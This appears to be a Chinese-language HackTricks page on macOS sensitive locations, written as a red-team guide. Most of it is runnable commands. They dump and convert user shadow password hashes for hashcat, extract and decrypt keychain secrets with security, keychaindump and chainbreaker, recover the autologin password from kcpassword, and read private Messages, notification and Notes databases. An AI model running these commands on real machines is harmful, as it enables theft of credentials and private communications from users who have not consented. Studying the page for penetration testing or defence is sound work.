hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md

10 KiB
Raw Blame History

macOS敏感位置

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式

密码

阴影密码

阴影密码与用户配置一起存储在位于**/var/db/dslocal/nodes/Default/users/中的plist文件中。
以下一行命令可用于转储
有关用户的所有信息**(包括哈希信息):

{% code overflow="wrap" %}

for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done

{% endcode %}

像这样的脚本这样的脚本可以用来将哈希转换为hashcat格式

另一个一行命令将以hashcat格式macOS PBKDF2-SHA512的-m 7100)转储所有非服务账户的凭证:

sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'

密钥链转储

请注意,使用 security 二进制文件来转储解密的密码时,系统会提示用户允许此操作。

#security
secuirty dump-trust-settings [-s] [-d] #List certificates
security list-keychains #List keychain dbs
security list-smartcards #List smartcards
security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries
security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)

Keychaindump

{% hint style="danger" %} 根据这个评论 juuso/keychaindump#10 (comment) 看起来这些工具在 Big Sur 上不再起作用。 {% endhint %}

Keychaindump 概述

一个名为 keychaindump 的工具已被开发用于从 macOS 钥匙串中提取密码,但在像 Big Sur 这样的较新 macOS 版本上面临限制,正如在讨论中所指出的。使用 keychaindump 需要攻击者获取访问权限并提升至 root 权限。该工具利用了钥匙串在用户登录时默认解锁的事实,以方便应用程序访问它,而无需反复要求用户输入密码。然而,如果用户选择在每次使用后锁定他们的钥匙串,keychaindump 就会失效。

Keychaindump 的操作是通过针对一个名为 securityd 的特定进程进行的,苹果公司将其描述为用于授权和加密操作的守护程序,对于访问钥匙串至关重要。提取过程涉及识别从用户登录密码派生的一个 主密钥。这个密钥对于读取钥匙串文件至关重要。为了定位 主密钥keychaindump 使用 vmmap 命令扫描 securityd 的内存堆,查找在标记为 MALLOC_TINY 的区域内的潜在密钥。以下命令用于检查这些内存位置:

sudo vmmap <securityd PID> | grep MALLOC_TINY

在识别潜在主密钥后,keychaindump 会搜索堆中特定模式(0x0000000000000018),该模式表明可能是主密钥的候选项。需要进一步步骤,包括解混淆,才能利用此密钥,具体步骤在 keychaindump 的源代码中有详细说明。专注于此领域的分析人员应注意,解密钥匙串的关键数据存储在 securityd 进程的内存中。运行 keychaindump 的示例命令如下:

sudo ./keychaindump

chainbreaker

Chainbreaker 可以以取证合规的方式从OSX钥匙串中提取以下类型的信息

  • 经过哈希处理的钥匙串密码,适合使用hashcatJohn the Ripper进行破解
  • 互联网密码
  • 通用密码
  • 私钥
  • 公钥
  • X509证书
  • 安全笔记
  • Appleshare密码

通过钥匙串解锁密码、使用volafoxvolatility获得的主密钥或者解锁文件如SystemKeyChainbreaker还将提供明文密码。

如果没有这些解锁钥匙串的方法Chainbreaker将显示所有其他可用信息。

转储钥匙串密钥

#Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain

使用SystemKey转储钥匙串密钥包括密码

# First, get the keychain decryption key
# To get this decryption key you need to be root and SIP must be disabled
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
## Use the previous key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

转储钥匙串密钥(包括密码)破解哈希

# Get the keychain hash
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
# Crack it with hashcat
hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
# Use the key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

使用内存转储来转储钥匙串密钥(包括密码)

按照这些步骤执行内存转储

#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
# Unformtunately volafox isn't working with the latest versions of MacOS
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump

#Try to extract the passwords using the extracted keychain passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

使用用户密码转储钥匙串密钥(包括密码)

如果您知道用户的密码,您可以使用它来转储并解密属于用户的钥匙串

#Prompt to ask for the password
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db

kcpassword

kcpassword文件是一个文件,其中保存着用户的登录密码,但仅当系统所有者已启用自动登录时。因此,用户将自动登录,而无需输入密码(这并不是很安全)。

密码存储在文件**/etc/kcpassword中,使用密钥0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F**进行异或运算。如果用户的密码长度超过密钥长度,则密钥将被重复使用。
这使得密码相当容易被恢复,例如使用这样的脚本

数据库中的有趣信息

Messages

sqlite3 $HOME/Library/Messages/chat.db .tables
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment'
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'

通知

您可以在$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/中找到通知数据。

大部分有趣的信息将会在blob中。因此,您需要提取该内容并将其转换易读的格式,或者使用**strings**。要访问它,您可以执行:

{% code overflow="wrap" %}

cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack

{% endcode %}

注意事项

用户的笔记可以在 ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite 中找到

{% code overflow="wrap" %}

sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables

#To dump it in a readable format:
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done

{% endcode %}

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式